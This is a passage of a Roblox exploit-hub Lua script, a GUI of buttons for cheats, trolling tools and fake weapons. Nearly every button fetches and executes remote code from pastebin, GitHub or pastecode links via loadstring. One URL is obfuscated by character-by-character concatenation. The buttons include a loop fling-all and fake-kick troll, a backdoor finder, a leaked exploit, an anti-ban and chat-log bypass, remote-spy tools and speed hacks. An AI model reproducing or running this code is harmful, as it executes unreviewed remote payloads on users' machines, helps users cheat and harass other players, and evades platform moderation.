loadstring(game:HttpGet(('h'..'t'..'t'..'p'..'s'..':'..'/'..'/'..'p'..'a'..'s'..'t'..'e'..'f'..'y'..'.'..'a'..'pp'..'/'..'G'..'o'..'K'..'x'..'Y'..'B'..'k'..'U'..'/'..'r'..'a'..'w'), true))()
3241
end)
3242
3243
FeSection:NewButton("FE bring gui (kollision games only)", "kollision games only", function()
3244
--febringgui
3245
loadstring(game:HttpGet("https://pastecode.dev/raw/yd80ly8m/FEbringgui_lulaslollipop",true))()
3246
end)
3247
3248
FeSection:NewButton("FE Orbit player", "spin em", function()--skrip
3249
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe./main/Orbit%20GUI"))()
3250
--notif
3251
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
3252
end)
3253
3254
FeSection:NewButton("FE 2007 animation", "baxk to the old days", function()
3255
loadstring(game:HttpGet("https://pastebin.com/raw/8gi79AtK"))()
3256
end)
3257
3258
FeSection:NewButton("FE fly any hat like a dragon", "use keybind stroke to move", function()
3259
loadstring(game:HttpGet("https://raw.githubusercontent.com/BidoSkinsYT/BidoSkinsYT/main/Fe%20hat%20Dragon"))()
3260
end)
3261
3262
FeSection:NewButton("FE Headless", "yellow grey", function()
3263
loadstring(game:HttpGet("https://pastebin.com/raw/Fp0GgURD"))()
3264
end)
3265
3266
FeSection:NewButton("FE WAR ENDER", "warendergod", function()
3267
loadstring(game:HttpGet("https://textbin.net/raw/nos6oilby7"))()
3268
end)
3269
3270
FeSection:NewButton("FE Krazy", "by dark", function()
3271
loadstring(game:HttpGet("https://textbin.net/raw/rdssq0b2em"))()
3272
end)
3273
3274
FeSection:NewButton("FE Kreepy Krawler", "turns u into kreepy krawler", function()
3275
loadstring(game:HttpGet("https://pastebin.com/raw/rzcFPsLn"))()
3276
end)
3277
3278
FeSection:NewButton("FE Avatar Kreator", "move your axxessories anywhere", function()
3279
loadstring(game:HttpGet("https://pastebin.com/raw/TTQn3RDk"))()
3280
end)
3281
3282
FeSection:NewButton("FE Kamera Slider", "yeah", function()
3283
loadstring(game:HttpGet("https://raw.githubusercontent.com/rouxhaver/scripts-2/main/Camera%20Sliders.lua"))()
3284
end)
3285
3286
FeSection:NewButton("FE Mimik GUI", "kopy users messages", function()
3287
loadstring(game:HttpGet('https://raw.githubusercontent.com/0Ben1/fe./2520c121ab919b2b9697ab5c70797dcfdaa5db43/Ohio'))()
3288
end)
3289
3290
FeSection:NewButton("FE Mimik GUI 2 (no username)", "kopy users messages", function()
3291
loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe./8fb5ed20fb168d1ae3044ede45b90f67e3fb37a2/file'),true))()
3292
end)
3293
3294
FeSection:NewButton("FE Message Art", "turn text into art", function()
3295
loadstring(game:HttpGet("https://textbin.net/raw/hmtw3zllmp",true))()
3296
end)
3297
3298
FeSection:NewButton("FE break arms", "break arms duh", function()-- break arms FE
3299
loadstring(game:HttpGet('https://raw.githubusercontent.com/0Ben1/fe./main/Wow'))()
3300
3301
loadstring(game:HttpGet('https://raw.githubusercontent.com/0Ben1/fe./main/Wow%202'))()
3302
end)
3303
3304
FeSection:NewButton("FE Invisible & Teleport GUI", "any game *op*", function()-- FE Invisible GUI & Teleport R15/R6 | ANY GAME *OP*
3305
loadstring(game:HttpGet('https://raw.githubusercontent.com/0Ben1/fe./dbb6ce6f6cee4f7a5c9e20d7b88e83db2a93bf25/Invisible%20GUI'))()
3306
end)
3307
3308
3309
--// more skripts \\--
3310
local ex = Window:NewTab("Teleports & Extras")
3311
3312
local exSection = ex:NewSection("99% fail impossible obby teleportation")
3313
3314
exSection:NewButton("Teleport on Treasure Box", "teleport to the xhest",
3315
function()-- teleport to xhest
3316
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-351.3232421875, 2006.439453125, -150.55206298828125)
3317
end)
3318
3319
exSection:NewButton("Teleport Behind treasure", "teleport to the xhest",
3320
function()-- teleport behind xhest
3321
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-362.5283203125, 1995.8741455078125, -149.48646545410156)
3322
end)
3323
3324
exSection:NewButton("Teleport to Danger Zone (tile 40)", "teleport to dz",
3325
function()-- teleport to dzaktually
3326
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(349741844177246094, 1994.09912109375, -143.1316680908203)
3327
end)--tptodz
3328
3329
exSection:NewButton("Teleport to Start", "teleport to beginning",
3330
function()Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(253.8822479248047, 1995.86083984375, -149.1727752685547)
3331
end)--tptostart
3332
3333
exSection:NewButton("Teleport to Winners Room", "teleport to the golden room",
3334
function()-- teleport to winning room
3335
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(314.3387451171875, 17002.197265625, 202.53802490234375)
3336
end)
3337
3338
exSection:NewButton("Teleport to Offixe Seat", "sits u in the offixe seat",
3339
function()-- sit in the offixe
3340
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(259.6474304199219, 17004.259765625,
3341
162.38287353515625)
3342
-- sit while tp
3343
game.Players.LocalPlayer.Character.Humanoid.Sit = true
3344
end)
3345
3346
exSection:NewButton("Teleport to Hidden Roof", "teleport to unknown area",
3347
function()-- teleport to hidden 99
3348
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(269.36907958984375, 17024.74609375,
3349
139.19142150878906)
3350
end)
3351
3352
exSection:NewButton("Teleport to Hidden Light Balkony", "teleport to balkonylight area",
3353
function()-- teleport to hidden 99
3354
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(238.35618591308594, 17003.28125, 184.2260284423828)
3355
end)
3356
3357
exSection:NewButton("Teleport to Hidden Dark Balkony", "teleport to hidden area3",
3358
function()-- teleport to hidden 3
3359
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(277.52764892578125, 16989.912109375, 123.23657989501953)
3360
end)
3361
3362
exSection:NewButton("Teleport to Hidden Room", "teleport to hidden 4",
3363
function()-- teleport to hidden 3
3364
Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(291.8058776855469, 17003.28125, 165.9874267578125)
3365
end)
3366
--[endTP]--
3367
3368
exSection:NewLabel("Teleport To Game")
3369
exSection:NewLabel("ask for more game teleports if your game is not here๐Ÿญ")
3370
3371
exSection:NewButton("Teleport to 99% fail impossible obby", "no info", function()-- tp to 99
3372
local PlaceId = 7584496019 -- gameID
3373
3374
game:GetService("TeleportService"):Teleport(PlaceId, game:GetService("Players").LocalPlayer)
3375
end)
3376
3377
exSection:NewButton("Teleport to Zombie Attaxk", "no info", function()-- tp to zombie atk
3378
local PlaceId = 1240123653 -- gameID
3379
3380
game:GetService("TeleportService"):Teleport(PlaceId, game:GetService("Players").LocalPlayer)
3381
end)
3382
3383
local exSection = ex:NewSection("Troll")
3384
3385
exSection:NewButton("Non-FE Hub (old)", "some dont work", function()-- NONFE HUB
3386
loadstring(game:HttpGet("https://pastebin.com/raw/mjPzCChH"))()
3387
end)
3388
3389
exSection:NewButton("Klone script", "klones ur avatar not fe", function()
3390
loadstring(game:GetObjects('rbxassetid://7339698872')[1].Source)()
3391
end)
3392
3393
exSection:NewButton("Fake kixk", "when people leave it makes them think you kixk them", function()
3394
loadstring(game:HttpGet('https://pastebin.com/raw/9H4EGzHg'))()
3395
end)
3396
3397
exSection:NewButton("Loop Fling all", "automatikally flings people", function()
3398
loadstring(game:HttpGet('https://github.com/DigitalityScripts/roblox-scripts/raw/main/loop%20fling%20all'))()
3399
end)
3400
3401
3402
exSection:NewLabel("Weapons")
3403
3404
exSection:NewButton("Klumsy Gunner", "kool", function()-- klumsy gunner
3405
loadstring(game:HttpGet("https://pastebin.com/raw/VdfTg8Rm"))()
3406
end)
3407
3408
exSection:NewButton("Army Gunner", "๐Ÿช–", function()-- army gunner
3409
loadstring(game:HttpGet("https://pastebin.com/raw/6yf2cDfG"))()
3410
end)
3411
3412
exSection:NewButton("Annoying Dual Pistols", "annoying", function()-- annoying dualpistols
3413
loadstring(game:HttpGet("https://pastebin.com/raw/vWMd3ErY"))()
3414
end)
3415
3416
exSection:NewButton("Alien Rifle", "annoying", function()-- huge double barrel alien rifle
3417
loadstring(game:HttpGet("https://pastebin.com/raw/Ntq5K6gC"))()
3418
end)
3419
3420
exSection:NewButton("Kamikaze", "timed bomb vest๐Ÿ’ฃ", function()-- kamikaze time bomb
3421
loadstring(game:HttpGet("https://pastebin.com/raw/W34i4R8N"))()
3422
end)
3423
3424
exSection:NewButton("Skull Smasher", "use mobile keyboard for movelist", function()-- SKULL SMASHER
3425
loadstring(game:HttpGet("https://pastebin.com/raw/tnevgHaV"))()
3426
end)
3427
3428
exSection:NewButton("Dark Edged Dual Blades", "use mobile keyboard for movelist", function()-- dark edged dual blades
3429
loadstring(game:HttpGet("https://pastebin.com/raw/C334rgCT"))()
3430
end)
3431
3432
exSection:NewButton("How to train your dragon", "gives u the pet from tbe movie", function()-- how to train your dragon pet
3433
loadstring(game:HttpGet("https://pastebin.com/raw/iQZ9PJ4x"))()
3434
end)
3435
3436
exSection:NewButton("Water Rings", "yes", function()-- water rings
3437
loadstring(game:HttpGet("https://pastebin.com/raw/ijWxVpmf"))()
3438
end)
3439
3440
exSection:NewButton("Dual Shield Lasers", "yes", function()-- dual dark shield lasers
3441
loadstring(game:HttpGet("https://pastebin.com/raw/XpzHT9Fh"))()
3442
end)
3443
3444
exSection:NewButton("Glowing Matrix Man", "yes", function()-- glowing matrix runner
3445
loadstring(game:HttpGet("https://pastebin.com/raw/SwLFx5pw"))()
3446
end)
3447
3448
exSection:NewButton("Robot Umbrella", "yes", function()-- dangerous umbrella
3449
loadstring(game:HttpGet("https://pastebin.com/raw/V78KfuNf"))()
3450
end)
3451
3452
exSection:NewButton("Invisible Laser Shooter", "kool", function()-- invisible laser shooter
3453
loadstring(game:HttpGet("https://pastebin.com/raw/8Za5RNGH"))()
3454
end)
3455
3456
exSection:NewButton("Dual Plasma Rifles", "yes", function()-- dual plasma shooter
3457
loadstring(game:HttpGet("https://pastebin.com/raw/HEvM7C2t"))()
3458
end)
3459
3460
exSection:NewButton("Shotgun", "partner", function()-- shotgun
3461
loadstring(game:HttpGet("https://pastebin.com/raw/aMgrBsnQ"))()
3462
end)
3463
3464
exSection:NewButton("Bomb Vest", "blow urself up", function()-- shotgun
3465
loadstring(game:HttpGet("https://pastebin.com/raw/aMgrBsnQ"))()
3466
end)
3467
3468
exSection:NewButton("The Big Blank R6", "blank r6 guy", function()-- Blank R6 guy
3469
loadstring(game:HttpGet("https://pastebin.com/raw/pRETy1aA"))()
3470
end)
3471
3472
exSection:NewButton("M86-SR Bipod", "snipeup", function()--M89-SR with Bipod
3473
loadstring(game:HttpGet("https://pastebin.com/raw/4sBhUxS0"))()
3474
end)
3475
3476
exSection:NewButton("Unknown Magik", "magixian", function()-- unknown Magik
3477
loadstring(game:HttpGet("https://pastebin.com/raw/FSH0S4C2"))()
3478
end)
3479
3480
exSection:NewButton("Invisible Weapon", "no info", function()-- invisible weapon
3481
loadstring(game:HttpGet("https://pastebin.com/raw/GCUivFzA"))()
3482
end)
3483
3484
exSection:NewButton("Speedy Winged Fighter", "no info", function()-- speedy winged fighter
3485
loadstring(game:HttpGet("https://pastebin.com/raw/RKPE68Gz"))()
3486
end)
3487
3488
exSection:NewButton("Dual M1911's", "no info", function()-- dual m1911
3489
loadstring(game:HttpGet("https://pastebin.com/raw/N1Jr8BBd"))()
3490
end)
3491
3492
exSection:NewButton("Winged Fire", "no info", function()-- Winged Fire
3493
loadstring(game:HttpGet("https://pastebin.com/L0GbxNfL"))()
3494
end)
3495
3496
3497
3498
3499
-- Home.TabMy.Skrpts
3500
3501
local Home = Window:NewTab("Home")
3502
local HomeSection = Home:NewSection("Home")
3503
3504
HomeSection:NewButton("๐Ÿ”Ž Skript", "look up any skript", function()
3505
loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/ScriptSearcher"))()
3506
end)
3507
3508
HomeSection:NewTextBox("Walkspeed","xhanges the walkspeed", function(e)game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=e
3509
end)
3510
3511
HomeSection:NewTextBox("Jump Power","xhanges the jumppower", function(e)game.Players.LocalPlayer.Character.Humanoid.JumpHeight=e
3512
end)
3513
3514
HomeSection:NewButton("Reset Walkspeed","reset walkspeed to default", function()game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
3515
end)
3516
3517
HomeSection:NewButton("Reset Walkspeed/Jumppower", "resets Walkspeed and jumpPower to default", function()
3518
game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
3519
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
3520
end)
3521
3522
HomeSection:NewButton("tagapagpatupad", "xherushutup", function()
3523
--99
3524
loadstring(game:HttpGet("https://pastecode.dev/raw/E7GMNU4Q/99fail-fling_lulaslollipop",true))()
3525
end)
3526
3527
HomeSection:NewButton("Ping Kounter", "see ping", function()
3528
loadstring(game:HttpGet("https://pastebin.com/raw/MvKKJ331"))()
3529
end)
3530
HomeSection:NewButton("Rejoin", "rejoins the same lobby",
3531
function()--rejoin lobby
3532
local ts = game:GetService("TeleportService")
3533
3534
local p = game:GetService("Players").LocalPlayer
3535
3536
3537
3538
ts:TeleportToPlaceInstance(game.PlaceId, game.JobId, p)
3539
end)
3540
HomeSection:NewButton("Server Hop", "leave the game",
3541
function()
3542
loadstring(game:HttpGet("https://pastebin.com/raw/KahMvMeh"))()
3543
end)
3544
HomeSection:NewButton("Join Lowest Player Server", "makes u join same game but lowest player",
3545
function()loadstring(game:HttpGet("https://pastebin.com/raw/H0LwsNGc"))()
3546
end)
3547
HomeSection:NewButton("Exit", "leave the game",
3548
function()game:Shutdown()
3549
end)
3550
HomeSection:NewButton("No Lib %FO", "nolib%", function()loadstring(game:HttpGet("https://pastebin.com/raw/2Vxg0a72"))()
3551
end)
3552
HomeSection:NewButton("Get Koords", "x,y,z finder say /console", function()print(Game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position)
3553
end)
3554
HomeSection:NewButton("BaxkDoorFinder", "finds a baxkdoor for admin or additional skripts", function()
3555
loadstring(game:HttpGet(('https://raw.githubusercontent.com/iK4oS/backdoor.exe/master/source.lua'),true))()
3556
end)
3557
HomeSection:NewButton("Harked Reborn V2 (leaked)", "only in sekret games", function()
3558
loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Harked-Skript-6804"))()
3559
end)
3560
HomeSection:NewButton("Anti AFK", "disables afk limit", function()
3561
---- Roblox Anti Afk Script
3562
3563
wait(0.5)local ba=Instance.new("ScreenGui")
3564
local ca=Instance.new("TextLabel")local da=Instance.new("Frame")
3565
local _b=Instance.new("TextLabel")local ab=Instance.new("TextLabel")ba.Parent=game.CoreGui
3566
ba.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;ca.Parent=ba;ca.Active=true
3567
ca.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ca.Draggable=true
3568
ca.Position=UDim2.new(0.698610067,0,0.098096624,0)ca.Size=UDim2.new(0,370,0,52)
3569
ca.Font=Enum.Font.SourceSansSemibold;ca.Text="Anti AFK Skript"ca.TextColor3=Color3.new(0,1,1)
3570
ca.TextSize=22;da.Parent=ca
3571
da.BackgroundColor3=Color3.new(0.196078,0.196078,0.196078)da.Position=UDim2.new(0,0,1.0192306,0)
3572
da.Size=UDim2.new(0,370,0,107)_b.Parent=da
3573
_b.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)_b.Position=UDim2.new(0,0,0.800455689,0)
3574
_b.Size=UDim2.new(0,370,0,21)_b.Font=Enum.Font.Arial;_b.Text="made by lulaslollipop"
3575
_b.TextColor3=Color3.new(0,1,1)_b.TextSize=20;ab.Parent=da
3576
ab.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ab.Position=UDim2.new(0,0,0.158377,0)
3577
ab.Size=UDim2.new(0,370,0,44)ab.Font=Enum.Font.ArialBold;ab.Text="Status: Aktive"
3578
ab.TextColor3=Color3.new(0,1,1)ab.TextSize=20;local bb=game:service'VirtualUser'
3579
game:service'Players'.LocalPlayer.Idled:connect(function()
3580
bb:CaptureController()bb:ClickButton2(Vector2.new())
3581
ab.Text="Roblox tried to kixk u but i kixked him instead"wait(2)ab.Text="Status : Aktive"end)
3582
end)
3583
3584
HomeSection:NewButton("Dark Dex mobile", "darkdex for mobile", function()--dark dex mobile
3585
getgenv().Key = "Bash"
3586
loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/Refinement/main/MC%3AIY%20Dex",true))()
3587
end)
3588
3589
HomeSection:NewButton("/cmds", "type '.' into the searxh bar to view all skripts", function()
3590
_G.posX = 0.405
3591
_G.posY = 0.9
3592
_G.searchButton = ";"
3593
_G.commandPrefix = "/"
3594
3595
spawn(loadstring(game:HttpGet('https://raw.githubusercontent.com/alvin677/search/main/search.lua'))())
3596
end)
3597
3598
HomeSection:NewButton("SimpleSpy For Mobile", "mobileskript", function()
3599
loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/RS/main/SimpleSpyMobile"))()
3600
-- SimpleSpy mobile
3601
end)
3602
3603
HomeSection:NewButton("Hydroxide mobile fix", "mobileskript", function()
3604
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Hydroxide-mobile-fix-8688"))()
3605
-- Hydroxide mobile fix
3606
end)
3607
3608
HomeSection:NewButton("Message Logs", "see xhatlogs gui", function()
3609
loadstring(game:GetObjects("rbxassetid://1295331911")[1].Source)()
3610
end)
3611
3612
HomeSection:NewButton("Destroy toggle", "bye", function()--gui destroyer
3613
for i,v in pairs(game.CoreGui:GetDescendants()) do
3614
if v.Name == "ScreenGui" then
3615
v:Destroy()
3616
end
3617
end
3618
end)
3619
3620
HomeSection:NewButton("obf", "no info", function()
3621
local userid = game.Players.LocalPlayer.UserId
3622
3623
if userid == 3001347724 or 4406450103 then
3624
--obFE
3625
loadstring(game:HttpGet("https://pastecode.dev/raw/d8ufe891/obFEskator_lulaslollipop",true))()
3626
else
3627
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/kustomnotif/main/notifikation_lulaslollipop",true))()
3628
Notify("๐Ÿ”’", "No Access", 5)
3629
end
3630
end)
3631
HomeSection:NewButton("ANTI()", "anti xhat logger & xhatbypass", function()
3632
-- anti xhatlog/xhatbypass
3633
loadstring(game:HttpGet("https://pastecode.dev/raw/zqbxv42b/antiban-lulas-xheruONLY_lulaslollipop.m4a",true))()
3634
--onlyallowedexploiters--
3635
end)
3636
3637
3638
3639
3640
-- More.TabMy.Skrpts
3641
local More = Window:NewTab("More")
3642
local MoreSection = More:NewSection("more skripts koming soon...๐Ÿญ")
3643
3644
MoreSection:NewButton("Player Notifier", "will notify if a player leaves/joined",
3645
function()-- player joined/left lobby
3646
loadstring(game:HttpGet("https://pastebin.com/raw/c5JacC0M"))()
3647
-- notifikation joiend/left
3648
game.StarterGui:SetCore("SendNotification", {
3649
Title = "Player Notifierโœ…On";
3650
Text = "u will be notified wen players leave/join";
3651
3652
})
3653
end)
3654
3655
MoreSection:NewButton("Kopy Avatars (IY)", "use infinite yield 'copyid (playername)'",
3656
function()-- kopy avatar skript loadstring
3657
loadstring(game:HttpGet("https://pastebin.com/raw/9Tmvpzn4"))()
3658
end)
3659
3660
3661
--buttons.MoreSektion
3662
MoreSection:NewButton("Auto Grammar V2", "type with good punkuation(not that good so what)",
3663
function()shared.CustomCorrections = {
3664
["examplething12"] = "hello" -- if you say "examplething12" it will become hello
3665
}
3666
loadstring(game:HttpGet("https://raw.githubusercontent.com/eosuwu/boblox/main/autogremer.lua"))()
3667
end)
3668
3669
MoreSection:NewButton("Auto Klixker", "mighty klixker",
3670
function()-- mighty klixker
3671
getgenv().key = "Hostile"
3672
loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/The-telligence/main/MC%20KSystem%202"))()
3673
end)
3674
3675
MoreSection:NewButton("Anti Sit", "jumps if u sit",
3676
function()loadstring(game:HttpGet("https://pastebin.com/raw/HDUKxdUt"))()
3677
end)
3678
3679
MoreSection:NewButton("Faster Run", "run faster",
3680
function()shared["ๆœฌๅœฐๆ’ญๆ”พๅ™จ"] = game:FindService'Players'['LocalPlayer']
3681
shared["ๆ•ฐๅญฆ"] = math
3682
shared["ๅผ€ๆ–น"] = shared["ๆ•ฐๅญฆ"]['sqrt']
3683
shared["ๆœฌๅœฐๆ’ญๆ”พๅ™จ"]['Character']:FindFirstChildOfClass'Humanoid'.WalkSpeed = shared["ๅผ€ๆ–น"](1000) -- Speed exploit
3684
end)
3685
3686
MoreSection:NewButton("Stand Alone", "kreates a platform to stand by yourself",
3687
function()loadstring(game:HttpGet("https://pastebin.com/raw/eg8uzYiQ"))()
3688
end)
3689
3690
MoreSection:NewButton("Kneel", "kneel and walk",
3691
function()--Krouxh Animation ID: 287325678
3692
3693
local Crouch = Instance.new("Animation")
3694
Crouch.AnimationId = "rbxassetid://287325678"
3695
local DoIt = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Crouch)
3696
DoIt:Play()
3697
end)
3698
3699
MoreSection:NewButton("Kneel V2 (c to toggle)", "C to toggle USE GENERATE ANY KEYBIND skript",
3700
function()KEY = "C" -- Key to crouch
3701
CROUCHWALKSPEED = 12 -- Walkspeed when you are crouching
3702
3703
local Player = game:GetService("Players").LocalPlayer;
3704
local UserInputService = game:GetService("UserInputService");
3705
3706
local Character = Player.Character;
3707
local Humanoid = Character:FindFirstChildOfClass("Humanoid");
3708
local oldWS = Humanoid.WalkSpeed
3709
3710
local CrouchAnimation = Instance.new("Animation");
3711
CrouchAnimation.AnimationId = "rbxassetid://287325678";
3712
local Crouch = Humanoid:LoadAnimation(CrouchAnimation);
3713
Crouch.Priority = Enum.AnimationPriority.Action
3714
3715
local Crouching = false
3716
UserInputService.InputBegan:Connect(function(input,gameprocessed)
3717
if gameprocessed then return end
3718
if input.KeyCode == Enum.KeyCode[KEY] then
3719
Crouching = true
3720
Crouch:Play(.1)
3721
Humanoid.WalkSpeed = CROUCHWALKSPEED
3722
end
3723
end)
3724
3725
UserInputService.InputEnded:Connect(function(input,gameprocessed)
3726
if gameprocessed then return end
3727
if input.KeyCode == Enum.KeyCode[KEY] then
3728
Crouching = false
3729
Crouch:Stop(.1)
3730
Humanoid.WalkSpeed = oldWS
3731
end
3732
end)
3733
3734
Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
3735
if Crouching then
3736
Humanoid.WalkSpeed = CROUCHWALKSPEED
3737
end
3738
end)
3739
end)
3740
3741
--[ E M O J I S ]--
3742
MoreSection:NewLabel("Emojis")
3743
-- emoji buttons
3744
MoreSection:NewButton("๐Ÿ˜", "smiley", function()--player will say this
3745
game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜","All")
3746
end)
3747
MoreSection:NewButton("๐Ÿ˜†", "smiley", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜†","All")
3748
end)
3749
MoreSection:NewButton("๐Ÿ˜Š", "smiley", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜Š","All")
3750
end)
3751
MoreSection:NewButton("๐Ÿญ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿญ","All")
3752
end)
3753
MoreSection:NewButton("๐Ÿญ๐Ÿญ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿญ๐Ÿญ","All")
3754
end)
3755
MoreSection:NewButton("๐Ÿญ๐Ÿญ๐Ÿญ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿญ๐Ÿญ๐Ÿญ","All")
3756
end)
3757
MoreSection:NewButton("๐Ÿญ๐Ÿ˜‹", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿญ๐Ÿ˜‹","All")
3758
end)
3759
MoreSection:NewButton("๐Ÿ˜", "heart eyes", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜","All")
3760
end)
3761
MoreSection:NewButton("๐Ÿ’•", "2 hearts", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ’•","All")
3762
end)
3763
MoreSection:NewButton("โค๏ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("โค๏ธ","All")
3764
end)
3765
MoreSection:NewButton("โค๏ธโค๏ธโค๏ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("โค๏ธโค๏ธโค๏ธ","All")
3766
end)
3767
MoreSection:NewButton("๐Ÿคฃ", "rofl", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿคฃ","All")
3768
end)
3769
MoreSection:NewButton("๐Ÿคฃ๐Ÿคฃ", "rofl 2x", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿคฃ๐Ÿคฃ","All")
3770
end)
3771
MoreSection:NewButton("๐Ÿ˜˜", "kiss emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜˜","All")
3772
end)
3773
MoreSection:NewButton("๐Ÿ˜‚", "laugh", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜‚","All")
3774
end)
3775
MoreSection:NewButton("๐Ÿ˜‚๐Ÿ˜‚", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜‚๐Ÿ˜‚","All")
3776
end)
3777
MoreSection:NewButton("๐Ÿฅฐ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฅฐ","All")
3778
end)
3779
MoreSection:NewButton("๐Ÿฅฐ๐Ÿฅฐ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฅฐ๐Ÿฅฐ","All")
3780
end)
3781
MoreSection:NewButton("๐Ÿ˜Š", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜Š","All")
3782
end)
3783
MoreSection:NewButton("๐Ÿ˜‹", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜‹","All")
3784
end)
3785
MoreSection:NewButton("๐Ÿ˜‹๐Ÿ˜‹", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜‹๐Ÿ˜‹","All")
3786
end)
3787
MoreSection:NewButton("โ˜บ๏ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("โ˜บ๏ธ","All")
3788
end)
3789
MoreSection:NewButton("๐Ÿคช", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿคช","All")
3790
end)
3791
MoreSection:NewButton("๐Ÿ˜›", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜›","All")
3792
end)
3793
MoreSection:NewButton("๐Ÿ˜Ž", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜Ž","All")
3794
end)
3795
MoreSection:NewButton("๐Ÿ˜‡", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜‡","All")
3796
end)
3797
MoreSection:NewButton("๐Ÿ˜‡๐Ÿฅฐ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜‡๐Ÿฅฐ","All")
3798
end)
3799
MoreSection:NewButton("๐Ÿ‘‘", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‘‘","All")
3800
end)
3801
MoreSection:NewButton("๐Ÿˆ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿˆ","All")
3802
end)
3803
MoreSection:NewButton("๐Ÿ˜ฎโ€๐Ÿ’จ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ฎโ€๐Ÿ’จ","All")
3804
end)
3805
MoreSection:NewButton("๐Ÿ™„", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ™„","All")
3806
end)
3807
MoreSection:NewButton("๐Ÿ‘€", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‘€","All")
3808
end)
3809
MoreSection:NewButton("๐Ÿ˜ญ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ญ","All")
3810
end)
3811
MoreSection:NewButton("๐Ÿค”", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿค”","All")
3812
end)
3813
